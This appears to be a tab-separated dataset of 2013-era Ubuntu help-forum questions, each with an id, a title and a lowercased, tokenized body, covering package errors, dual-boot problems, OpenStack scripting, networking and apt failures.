297644	skype when installed showing error messages or unmet dependencies	i was trying to install skype but even though it got installed an error message is being shown on the top as broken and wen i entered the terminal to resolve it , aging error messages are being shown and even it ca n't be removed .the messages are shown like this.how could i correct it or uninstall it . plavilayil @ plavilayil-system-product-name : ~ $ sudo apt-get install -f [ sudo ] password for plavilayil : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libgladeui-1-11 gir1.2-gconf-2.0 unity-2d-launcher libglew1.5 libevemu1 libglewmx1.5 libtextcat0 zeitgeist-extension-fts libtextcat-data icc-profiles-free libid3tag0 libnatpmp1 unity-2d-places libllvm2.9 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : skype the following packages will be upgraded : skype 1 upgraded , 0 newly installed , 0 to remove and 147 not upgraded . 1 not fully installed or removed . need to get 0 b/15.4 kb of archives . after this operation , 37.0 mb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of skype : skype depends on libqt4-webkit ( > = 4:4.5.3 ) ; however : package libqt4-webkit is not installed . skype-bin ( 4.1.0.20.0-0ubuntu0.12.04.2 ) breaks skype ( < < 4.1.0.20.0-0ubuntu0.12.04.1 ) and is installed . version of skype to be configured is 4.1.0.20-1. dpkg : error processing skype ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : skype e : sub-process /usr/bin/dpkg returned an error
297647	grub rescue ... delete ubuntu ... windows 8 ... purple screen	okay so i noticed i am basically screwed and have been working on this for hours . i tried to dual boot my windows 8 , but i am still a beginner and failed . i am at the point where i delete ubuntu , get stuck on grub rescue and try to use liveusb to fix ( did not work ) . i tried to leave ubuntu on , but i am now stuck on hanging purple screen ( tried to use repair and other solutions nothing worked ) . i just want to get back onto windows 8 and dual boot this properly .
297660	how to have facebook notifications in the messaging menu on 13.04	i have used fbuntu before on ubuntu precise but the time i move to raring , fbuntu does n't work anymore . also i have tried empathy but it only manages/shows my messages . anyone know how to achive these
297663	does ubuntu 13.04 desktop ( 32 bit ) already have open stack bundled in ?	from the the literature , it seems that only ubuntu 13.04 server ( 64-bit ) has open stack bundled in , and not ubuntu 13.04 desktop ( 32-bit ) . is this true ? also it seems that there is no ubuntu 13.04 server ( 32-bit ) codes available for download . is this true ? as such , is there , by any chance , that i could install and run open stack on ubuntu ( 32-bit ) desktop , if it has not already been bundled in ? please provide me with instructions or pointers to instructions , whih explain how i could run open stack on top of ubuntu 13.04 ( 32-bit ) desktop . thanks ,
297664	can not access ppa ... please check your internet connection	i 've tried to add a repository with : sudo apt-add-repository ppa : gottcode/gcppacannot access ppa but the system echoed : can not access ppa ( https : //launchpad.net/api/1.0/~gottcode/+archive/gcppa ) to get ppa information , please check your internet connection . even though my internet connection is working fine .
297668	would like to install ubuntu on secondary hard drive within my computer	okay , so here 's the story . i am trying to install ubuntu 13.04 . i currently have a 2tb drive in my computer where windows 7 boots from , and a secondary 500gb drive that also has a bootable installation of windows 7 , because the version on the 2tb is a clone of what was on the 500.. i do not need any information on the 500 as i already have it moved over to the 2tb . what i want is to completely reformat the 500 so that it has about 300gb for ntfs and the rest for ubuntu . however , i ca n't seem to find a straightfoward way to do that in the ubuntu installer . if i click on `` install ubuntu alongside them , '' it does not give me the option to select my 500gb drive , only my 2tb . i do not want any linux partitions on my 2tb drive . i do not want to click , `` erase disc and install ubuntu '' for obvious reasons . finally , clicking `` something else '' brings up a menu that is quite confusing . i can kind of figure out how to use it , but it 's not as straightfoward as i 'd like.. further , i know that ubuntu requires a swap partition , but i do not know how much , or even how , to allocate that with the stupid dropdown menus it gives me . so , to get to the point.. what is the easiest , safest way to do what i want to do ? that is , allocate approximately 200g for ubuntu on my 500g drive , and be able to choose between windows 7 on my 2tb drive and ubuntu at startup - all , of coarse , without touching the 2tb drive at all . thanks !
297670	ubuntu 12.04 alongside windows 8 not booting	i installed ubuntu 12.04 alongside windows 8 without any problems . but when i start my system , windows 8 boots up without even asking which os i want to use . why is this happening and how can i rectify it . thanks
297672	atheros ar9285 patched driver	i am new to ubuntu and i have a problem installing patched drivers for my atheros ar9285 wireless adapter . where can i find drivers which support injection ? please help . thank you ... .
297679	bash script does not work	i am trying to run a bash script that does the following : the following bash script will populate keystone with some initial data : projects : admin and services roles : admin , member users : admin , demo , nova , glance , quantum , and cinder services : compute , volume , image , identity , ec2 , and network here is the script : # ! /bin/bash # modify these variables as needed admin_password= $ { admin_password : -password } service_password= $ { service_password : - $ admin_password } demo_password= $ { demo_password : - $ admin_password } export os_service_token= '' password '' export os_service_endpoint= '' http : //localhost:35357/v2.0 '' service_tenant_name= $ { service_tenant_name : -service } # mysql_user=keystone mysql_database=keystone mysql_host=localhost mysql_password=password # keystone_region=regionone keystone_host=10.10.10.10 # shortcut function to get a newly generated id function get_field ( ) { while read data ; do if [ `` $ 1 '' -lt 0 ] ; then field= '' ( \ $ ( nf $ 1 ) ) '' else field= '' \ $ $ ( ( $ 1 + 1 ) ) '' fi echo `` $ data '' | awk -f ' [ \t ] *\\| [ \t ] * ' `` { print $ field } '' done } # tenants admin_tenant= $ ( keystone tenant-create -- name=admin | grep `` id `` | get_field 2 ) demo_tenant= $ ( keystone tenant-create -- name=demo | grep `` id `` | get_field 2 ) service_tenant= $ ( keystone tenant-create -- name= $ service_tenant_name | grep `` id `` | get_field 2 ) # users admin_user= $ ( keystone user-create -- name=admin -- pass= '' $ admin_password '' -- email=admin @ domain.com | grep `` id `` | get_field 2 ) demo_user= $ ( keystone user-create -- name=demo -- pass= '' $ demo_password '' -- email=demo @ domain.com -- tenant-id= $ demo_tenant | grep `` id `` | get_field 2 ) nova_user= $ ( keystone user-create -- name=nova -- pass= '' $ service_password '' -- tenant-id $ service_tenant -- email=nova @ domain.com | grep `` id `` | get_field 2 ) glance_user= $ ( keystone user-create -- name=glance -- pass= '' $ service_password '' -- tenant-id $ service_tenant -- email=glance @ domain.com | grep `` id `` | get_field 2 ) quantum_user= $ ( keystone user-create -- name=quantum -- pass= '' $ service_password '' -- tenant-id $ service_tenant -- email=quantum @ domain.com | grep `` id `` | get_field 2 ) cinder_user= $ ( keystone user-create -- name=cinder -- pass= '' $ service_password '' -- tenant-id $ service_tenant -- email=cinder @ domain.com | grep `` id `` | get_field 2 ) # roles admin_role= $ ( keystone role-create -- name=admin | grep `` id `` | get_field 2 ) member_role= $ ( keystone role-create -- name=member | grep `` id `` | get_field 2 ) # add roles to users in tenants keystone user-role-add -- user-id $ admin_user -- role-id $ admin_role -- tenant-id $ admin_tenant keystone user-role-add -- tenant-id $ service_tenant -- user-id $ nova_user -- role-id $ admin_role keystone user-role-add -- tenant-id $ service_tenant -- user-id $ glance_user -- role-id $ admin_role keystone user-role-add -- tenant-id $ service_tenant -- user-id $ quantum_user -- role-id $ admin_role keystone user-role-add -- tenant-id $ service_tenant -- user-id $ cinder_user -- role-id $ admin_role keystone user-role-add -- tenant-id $ demo_tenant -- user-id $ demo_user -- role-id $ member_role # create services compute_service= $ ( keystone service-create -- name nova -- type compute -- description 'openstack compute service ' | grep `` id `` | get_field 2 ) volume_service= $ ( keystone service-create -- name cinder -- type volume -- description 'openstack volume service ' | grep `` id `` | get_field 2 ) image_service= $ ( keystone service-create -- name glance -- type image -- description 'openstack image service ' | grep `` id `` | get_field 2 ) identity_service= $ ( keystone service-create -- name keystone -- type identity -- description 'openstack identity ' | grep `` id `` | get_field 2 ) ec2_service= $ ( keystone service-create -- name ec2 -- type ec2 -- description 'openstack ec2 service ' | grep `` id `` | get_field 2 ) network_service= $ ( keystone service-create -- name quantum -- type network -- description 'openstack networking service ' | grep `` id `` | get_field 2 ) # create endpoints keystone endpoint-create -- region $ keystone_region -- service-id $ compute_service -- publicurl 'http : // ' '' $ keystone_host '' ':8774/v2/ $ ( tenant_id ) s ' -- adminurl 'http : // ' '' $ keystone_host '' ':8774/v2/ $ ( tenant_id ) s ' -- internalurl 'http : // ' '' $ keystone_host '' ':8774/v2/ $ ( tenant_id ) s' keystone endpoint-create -- region $ keystone_region -- service-id $ volume_service -- publicurl 'http : // ' '' $ keystone_host '' ':8776/v1/ $ ( tenant_id ) s ' -- adminurl 'http : // ' '' $ keystone_host '' ':8776/v1/ $ ( tenant_id ) s ' -- internalurl 'http : // ' '' $ keystone_host '' ':8776/v1/ $ ( tenant_id ) s' keystone endpoint-create -- region $ keystone_region -- service-id $ image_service -- publicurl 'http : // ' '' $ keystone_host '' ':9292/v2 ' -- adminurl 'http : // ' '' $ keystone_host '' ':9292/v2 ' -- internalurl 'http : // ' '' $ keystone_host '' ':9292/v2' keystone endpoint-create -- region $ keystone_region -- service-id $ identity_service -- publicurl 'http : // ' '' $ keystone_host '' ':5000/v2.0 ' -- adminurl 'http : // ' '' $ keystone_host '' ':35357/v2.0 ' -- internalurl 'http : // ' '' $ keystone_host '' ':5000/v2.0' keystone endpoint-create -- region $ keystone_region -- service-id $ ec2_service -- publicurl 'http : // ' '' $ keystone_host '' ':8773/services/cloud ' -- adminurl 'http : // ' '' $ keystone_host '' ':8773/services/admin ' -- internalurl 'http : // ' '' $ keystone_host '' ':8773/services/cloud' keystone endpoint-create -- region $ keystone_region -- service-id $ network_service -- publicurl 'http : // ' '' $ keystone_host '' ':9696/ ' -- adminurl 'http : // ' '' $ keystone_host '' ':9696/ ' -- internalurl 'http : // ' '' $ keystone_host '' ':9696/' but as i execute it , i get various errors . please guide me .
297680	create folders in remote server after ssh login using commands	i need to create folders on the remote server , i try to ssh to the server and then create folders . the logs display that the ssh is successful but it stops after that and the screen stays at the home folder after remote login . below is the command which i tried to execute but could not find a way out . def create_folder ( key_path , theme ) system ( `` ssh -i # { key_path } key_file.pem ubuntu @ ec2-**-***-**-***.ap-southeast-1.compute.amazonaws.com ; mkdir # { app.name } .git ; cd # { app.name } .git ; git init -- bare ; exit `` ) end please help
297681	upload folder with subfolders containing files	i am new to ubuntu . ubuntu caught my attention , because i tried to send a bigger attachment via thunderbird . now i want to upload a folder containing subfolders containing 216 files , overall 1,57 gb of data . i seem to be able to directly upload single files via the internet ( browser : firefox 21.0 ) interface but not folders with content . how can i achieve this ? thank you for your support hjstern
297685	ubuntu 12.04 audio playback silent ( vista stutters , fedora normal )	suddenly & without warning , i lost playback audio in ubuntu 12.04 . no startup sound , no mp3 's , no youtube audio . i downloaded the pulse audio volume control application ; it animates sound that is supposed to be playing . my system is dual-boot . when i boot into windows vista , i get the sound , but it stutters ; that is , i get a half-second of sound , followed by an instant of silence , and this sequence repeats , yielding a choppy sound , as though coming from the other side of a spinning fan . finally i tried a fedora liveusb . sound is fine . i 'm mostly concerned with ubuntu here , as that is my primary system . i include the output of the aplay -l command below . thanks in advance . [ root @ localhost liveuser ] # aplay -l **** list of playback hardware devices **** card 0 : nvidia [ hda nvidia ] , device 0 : alc268 analog [ alc268 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 1 : alc268 digital [ alc268 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 update : in the morning i booted into ubuntu and all sound worked fine . i booted into windows and the sound was working there too . then i booted back into ubuntu and they were no longer working .
297686	lubuntu does n't repond to keyboard ! + account not found ( wubi )	so when i boot my lubuntu up , i get like a screen with these random stripes that you 'd expect when your pc crashes . then when it boots up , i can log in with the account user , not the account i made in wubi . i ca n't normally boot it up with a live cd , my pc doesnt read it and goes straight to windows . so if anyone knows a fix , that would be great ! kind regards , gilles
297691	firefox 's popping up advertisement windows	for more than two weeks my firefox opens popping up advertisement windows . could there be a gap within ubuntu update system ? i think this way because i only apply updates that are sent by update manager and i use firefox for all my safe and serious works . meanwhile , i could not get rid off it . do you have any suggestions ?
297694	virtual machine ubuntu 13.04 is very slow	i installed ubuntu 13.04 in my vmware ( i 'm using windows 7 ) ; the problem is it 's quite slow ; it does n't response quickly as opposed to native installed os . i also installed centos & winxp ; they 're working fast as if they are not virtual machine . what should i do ?
297704	how to burn / create a bootable usb or cd for uefi-secure-boot	i used lili ( linuxlive usb creator ) to create a bootable usb stick based on the 64bit lubuntu 13.04 iso with windows 8 uefi secure boot . the stick starts only in legacy boot , but not in uefi mode . then , i tried it with a cd rom , because some people belives that some old and hidden stuff on the usb stick could disturb the boot processus . i clicked on the iso image ( also in windows 8 uefi secure boot mode ) `` burn to cd rom '' as described f.ex . here : https : //help.ubuntu.com/community/burningisohowto it does not work with uefi secure boot . the error message is : cdrom has been blocked by the current security policy [ ok ] as canonical had not a uefi licence for *buntu . when i start with uefi , but secure boot disabled , there is even not error message . in legacy mode , the cd rom works fine . as i have to start in uefi secure boot mode to install *buntu 13.04 alongside windows 8 in uefi secure boot mode : how to burn a bootable live cd in uefi secure boot mode ? either with win 8 or win xp or mac os 10.4.11 or a live cd in legacy mode ?
297711	is it safe to rollback wubi without fresh wubi install ?	i 've installed ubuntu 12.10 , then i made a backup from root.disk file . i decided to change from ubuntu to xubuntu . so i downloaded xubuntu 12.10 iso image and reinstalled wubi . in case i 'm want to rollback to ubuntu , is it safe to copy root.disk to c : \ubuntu\disks without reinstalling wubi first to ubuntu ?
297723	apt-get stuck at 0 % [ connecting to 10.134.216.1 ]	when i try to update with apt-get update , it 's stuck at 0 % [ connecting to 10.134.216.1 ] . changing the server does n't help . it seems like there is something wrong with my network settings , but i can browse the internet , everything works . i had a network class this week , just about assigning static ips , dhcp and gateways , i do n't know but maybe i broke something ? i find it weird because is 10.x.x.x not a private ip ? attachments requested by alaa : cat /etc/resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 195.130.130.4 nameserver 195.130.131.4 nameserver 127.0.1.1 search home ifconfig : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:10557 errors:0 dropped:0 overruns:0 frame:0 tx packets:10557 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2086889 ( 2.0 mb ) tx bytes:2086889 ( 2.0 mb ) wlan0 link encap : ethernet hwaddr e0 : b9 : a5 : f5:69:75 inet addr:192.168.0.191 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :e2b9 : a5ff : fef5:6975/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:236605 errors:0 dropped:0 overruns:0 frame:0 tx packets:146149 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:267402129 ( 267.4 mb ) tx bytes:19285063 ( 19.2 mb ) kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 cat /etc/apt/sources.list : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //ubuntu-archive.mirror.nucleus.be/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //ubuntu-archive.mirror.nucleus.be/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //ubuntu-archive.mirror.nucleus.be/ raring universe deb http : //ubuntu-archive.mirror.nucleus.be/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //ubuntu-archive.mirror.nucleus.be/ raring multiverse deb http : //ubuntu-archive.mirror.nucleus.be/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //ubuntu-archive.mirror.nucleus.be/ raring-backports main restricted universe multiverse deb http : //ubuntu-archive.mirror.nucleus.be/ raring-security main restricted deb http : //ubuntu-archive.mirror.nucleus.be/ raring-security universe deb http : //ubuntu-archive.mirror.nucleus.be/ raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main deb http : //www.freestatistics.org/cran/bin/linux/ubuntu raring/ # uitgeschakeld bij opwaardering naar raring # deb-src http : //www.freestatistics.org/cran/bin/linux/ubuntu raring/ # uitgeschakeld bij opwaardering naar raring deb http : //repos.codelite.org/ubuntu/ raring universe # uitgeschakeld bij opwaardering naar raring # deb-src http : //repos.codelite.org/ubuntu/ raring universe # uitgeschakeld bij opwaardering naar raring deb http : //repository.spotify.com stable non-free # uitgeschakeld bij opwaardering naar raring # deb-src http : //repository.spotify.com stable non-free # uitgeschakeld bij opwaardering naar raring update : i 'm sure my question is not a duplicate , i already tried to change the server to something else but this did n't change a thing . so i when i run apt-get update , this is the specific output : 0 % [ er wordt verbinding gemaakt met 10.134.216.1 ( 10.134.216.1 ) ] [ er wordt verbinding gemaakt met 10.134.216.1 ( 10.134.216.1 ) ] [ er wordt verbinding gemaakt met 10.134.216.1 ( 10.134.216.1 ) ] [ er wordt verbi_ it seems like apt-get update is caught in a loop . i discovered this by maximizing the terminal , otherwise i did n't saw it was endless repeating . i 'm sure that if my screen was wider , it would keep repeating .
297724	transfering of files from windows hangs randomly	i have a 40 gb folder to transfer ( some backup files from windoze machine ) , but it stops randomly . the other folder with 2 gb of data transferred ok , just not the big one . i 'm running truecrypt on windows , but that is n't the case as i 've tried transferring from a not encrypted source . same thing happens , just hangs . used latest 13.04 w/samba , tried it on mint , different cat cables etc . -- same thing . cheers !
297725	virtualbox ubuntu 13.04	in my ubuntu 13.04 virtualbox can not install the extension package . errorinstallazione dell'extension pack /home/ ... / ... ./oracle_vm_virtualbox_extension_pack-4.2.12-84980.vbox-extpack non riuscita the installer failed with exit code 1 : fontconfig warning : & quot ; /etc/fonts/conf.d/50-user.conf & quot ; , line 9 : reading configurations from ~/.fonts.conf is deprecated.. codice 'uscita : ns_error_failure ( 0x80004005 ) componente : extpackmanager interfaccia : iextpackmanager { 3295e6ce-b051-47b2-9514-2c588bfe7554 } have you any idea ?
297733	upgrading nginx on raring ringtail	i have have added ppa : nginx/stable to my apt sources . and have done an update . but when i try to upgrade , it fails to upgrade . here are the list of commands . sudo add-apt-repository ppa : nginx/stable sudo apt-get update sudo apt-get install nginx
297736	how to enable auto change wallpaper in unity in ubuntu 13.04 ?	i am unable to find any feature to make the desktop wallpaper autochange after an interval . if there is , please let me know . if not , then is there any app for the same ?
297739	how do i know if iprules are used ?	i followed this : how to save rules of the iptables ? and created this `` /etc/iptables.rules '' : # generated by iptables-save v1.4.12 on sun may 19 18:42:18 2013 *filter : input accept [ 429624:571594561 ] : forward accept [ 0:0 ] : output accept [ 174081:16941855 ] [ 0:0 ] -a input -s 173.194.55.0/24 -j reject -- reject-with icmp-port-unreachable [ 0:0 ] -a input -s 206.111.0.0/16 -j reject -- reject-with icmp-port-unreachable commit # completed on sun may 19 18:42:18 2013 how do i know this is being used ?
297740	ubuntu two users logged with same name	i have a server and a ssh session , but it seems like i 've pressed something and it was a shortcut so currently , when i do w it shows my other session ( which i do n't know how i opened ) . i closed my ssh client and accessed the shell via other method and it still showed 1 user logged . from what i read seems like i pressed accidentally some shortcut key and opened second terminal . my question is how do i close it ? i tried exit , it just returned logged out and users or w still shows 2 users . also , one of my users is pts/0 other is pts/1 . thanks in advance ; )
297741	how to get ubuntu download for a mac ?	i am trying to download ubuntu to put it on my daughter 's macbook ( just installed new hdd , so no operating system on it ) but from my windows pc all i can see is the windows ubuntu . can i use that , or is there a specific place i can go to get the ubuntu download for a mac please ?
297747	how is it possible to swap linux disk contents with win7 contents ?	i have used ubuntu 13.04 for some time now and i love it ! currently i have 2 disks in my pc : 2011 hdd with 1tb of space with win7 on it . 2006 hdd with 150gb of space with ubuntu 13.04 on it . as the 2006 drive is old ( and could fail any day now ) i would like to have win7 on the 160gb disk and ubuntu on the 1tb one . how would that be possible ?
297752	time changes when rebooting kubuntu	i have installed a dual boot system with windows 7 and kubuntu but every time i reboot my system ; time changes in my kubuntu . initially frequency of time changing was less but now its changing every time i reboot . rebooting not only changes the time in kubuntu but also changes time in windows also . i have seen similar problem in this same se kubuntu and windows 7 dual boot , clock time changes automatically , i tried to use the solution given there . sudo kate /etc/default/rcs but my utc value is already a no # assume that the bios clock is set to utc time ( recommended ) utc=no can anyone give a solution for this problem . advance thanks for the help
297753	inspiron 1545 failure to enable wireless device , ubuntu 12.10	first : wireless network hidden form my networks list , tring to search from help using some terminal commands . now : wireless not work at my labtop dell 1545 , using ubuntu 12.10 what can i do ?
297756	how can i report a suspected copyright or trademark infringement in a repo-hosted application ?	the problem : the application stroget looks and behaves exactly like minitube . flavio ( the creator of minitube ) and i suspect that someone took his work and used it without flavio 's permission . the reason for our suspicion : stroget looks and behaves exactly like minitube 2.0 the only difference is the welcome text when you start the application . `` welcome to minitube '' has been replaced by `` welcome to stroget '' . this is how minitube 2.0 looks like , this is how stroget looks like . minitube and stroget are available via the ubuntu software center . please visit minitube 's forum for more information ( i would post a link , but i am only allowed to post two ) . my question therefore is : how can we contact canonical about this , in order to analyze the situation ? is canonical the contact person - who is the official contact for an issue like this ? thank you for your time and effort .
297757	why after fresh ubuntu 12.04 installation update are n't being installed ?	i 've installed ubuntu 12.04 on a computer . everything is fine without update . just after the installation , it was showing about 200 mb updates to download . since then i 'm trying to install all the updates . now it 's partially completed , some of the software ( firefox , vlc ) is updated . still it 's showing 39.3 mb updates to download and it 's failing again and again . every time i tried to install these 39.3 mb updates , it shows that , it ca n't connect to internet , but there is no problem with my connection ( network indicator shows it 's connected and i can browse and download anything ) . it 's giving me the following message : failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-3.2.0-43-generic-pae_3.2.0-43.68_i386.deb size mismatch failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-3.2.0-43-generic-pae_3.2.0-43.68_i386.deb size mismatch i thought this is a problem with sources list . so i 've given the following command sudo rm -vf /var/lib/apt/lists/partial/* previously , i 've faced similar type of problem with a different computer . at that time , this solution worked for me , but now i 'm still facing this problem . anyone please help me to solve this problem . update here is the output of sudo apt-get update hit http : //dl.google.com stable release.gpg hit http : //archive.canonical.com precise release.gpg get:1 http : //extras.ubuntu.com precise release.gpg [ 72 b ] hit http : //dl.google.com stable release hit http : //us.archive.ubuntu.com precise release.gpg hit http : //archive.canonical.com precise release hit http : //dl.google.com stable/main i386 packages hit http : //extras.ubuntu.com precise release ign http : //dl.google.com stable/main translationindex get:2 http : //us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //archive.canonical.com precise/partner i386 packages hit http : //extras.ubuntu.com precise/main sources hit http : //us.archive.ubuntu.com precise-backports release.gpg ign http : //archive.canonical.com precise/partner translationindex hit http : //extras.ubuntu.com precise/main i386 packages hit http : //us.archive.ubuntu.com precise-security release.gpg ign http : //extras.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise release ign http : //dl.google.com stable/main translation-en_us get:3 http : //us.archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //dl.google.com stable/main translation-en get:4 http : //us.archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //archive.canonical.com precise/partner translation-en_us ign http : //archive.canonical.com precise/partner translation-en hit http : //us.archive.ubuntu.com precise-backports release hit http : //us.archive.ubuntu.com precise-security release ign http : //extras.ubuntu.com precise/main translation-en_us hit http : //us.archive.ubuntu.com precise/main sources ign http : //extras.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/restricted sources hit http : //us.archive.ubuntu.com precise/universe sources hit http : //us.archive.ubuntu.com precise/multiverse sources hit http : //us.archive.ubuntu.com precise/main i386 packages hit http : //us.archive.ubuntu.com precise/restricted i386 packages hit http : //us.archive.ubuntu.com precise/universe i386 packages hit http : //us.archive.ubuntu.com precise/multiverse i386 packages hit http : //us.archive.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/multiverse translationindex hit http : //us.archive.ubuntu.com precise/restricted translationindex hit http : //us.archive.ubuntu.com precise/universe translationindex get:5 http : //us.archive.ubuntu.com precise-updates/main sources [ 383 kb ] get:6 http : //us.archive.ubuntu.com precise-updates/main sources [ 383 kb ] get:7 http : //us.archive.ubuntu.com precise-updates/restricted sources [ 5,467 b ] get:8 http : //us.archive.ubuntu.com precise-updates/universe sources [ 87.1 kb ] get:9 http : //us.archive.ubuntu.com precise-updates/universe sources [ 87.1 kb ] get:10 http : //us.archive.ubuntu.com precise-updates/universe sources [ 87.1 kb ] get:11 http : //us.archive.ubuntu.com precise-updates/multiverse sources [ 6,582 b ] get:12 http : //us.archive.ubuntu.com precise-updates/main i386 packages [ 625 kb ] get:13 http : //us.archive.ubuntu.com precise-updates/restricted i386 packages [ 10.0 kb ] get:14 http : //us.archive.ubuntu.com precise-updates/universe i386 packages [ 203 kb ] get:15 http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 13.8 kb ] get:16 http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 13.8 kb ] 100 % [ 16 packages bzip2 0 b ] [ connecting to us.archive.ubuntu.com ( 91.189.91.14 bzip2 : compressed file ends unexpectedly ; perhaps it is corrupted ? *possible* reason follows . bzip2 : inappropriate ioctl for device input file = ( stdin ) , output file = ( stdout ) it is possible that the compressed file ( s ) have become corrupted . you can use the -tvv option to test integrity of such files . you can use the `bzip2recover ' program to attempt to recover data from undamaged sections of corrupted files . hit http : //us.archive.ubuntu.com precise-updates/main translationindex hit http : //us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted translationindex hit http : //us.archive.ubuntu.com precise-updates/universe translationindex hit http : //us.archive.ubuntu.com precise-backports/main sources hit http : //us.archive.ubuntu.com precise-backports/restricted sources hit http : //us.archive.ubuntu.com precise-backports/universe sources hit http : //us.archive.ubuntu.com precise-backports/multiverse sources hit http : //us.archive.ubuntu.com precise-backports/main i386 packages hit http : //us.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //us.archive.ubuntu.com precise-backports/universe i386 packages hit http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-backports/main translationindex hit http : //us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted translationindex hit http : //us.archive.ubuntu.com precise-backports/universe translationindex hit http : //us.archive.ubuntu.com precise-security/main sources hit http : //us.archive.ubuntu.com precise-security/restricted sources hit http : //us.archive.ubuntu.com precise-security/universe sources hit http : //us.archive.ubuntu.com precise-security/multiverse sources hit http : //us.archive.ubuntu.com precise-security/main i386 packages hit http : //us.archive.ubuntu.com precise-security/restricted i386 packages hit http : //us.archive.ubuntu.com precise-security/universe i386 packages hit http : //us.archive.ubuntu.com precise-security/multiverse i386 packages hit http : //us.archive.ubuntu.com precise-security/main translationindex hit http : //us.archive.ubuntu.com precise-security/multiverse translationindex hit http : //us.archive.ubuntu.com precise-security/restricted translationindex hit http : //us.archive.ubuntu.com precise-security/universe translationindex hit http : //us.archive.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en hit http : //us.archive.ubuntu.com precise-security/main translation-en hit http : //us.archive.ubuntu.com precise-security/multiverse translation-en hit http : //us.archive.ubuntu.com precise-security/restricted translation-en hit http : //us.archive.ubuntu.com precise-security/universe translation-en fetched 935 kb in 3min 39s ( 4,261 b/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead .
297759	simple speech recognition under linux	anyone have a simple tutorial for running speech recognition under linux ? i see that pocketsphinx is available as a binary download in the software centre , but running it from terminal fails reporting that it needs parameters , but i do not know what to put there . i tried installing all the voice models listed , but i do n't know where they get saved or how to make them work . i also was n't sure what to do to make sphinx3 work either . the sphinx3 manpages seem broken and the pocketsphinx one does n't have an example usage that makes sense to me . i 'm looking for something that gets 60 % correct recognition from microphone input with a limited vocabulary and words , and can then write that to a text file - this stuff existed in the late 1980s . so , i know it exists and should work somehow . thanks . ( p.s . internet connection is a no go )
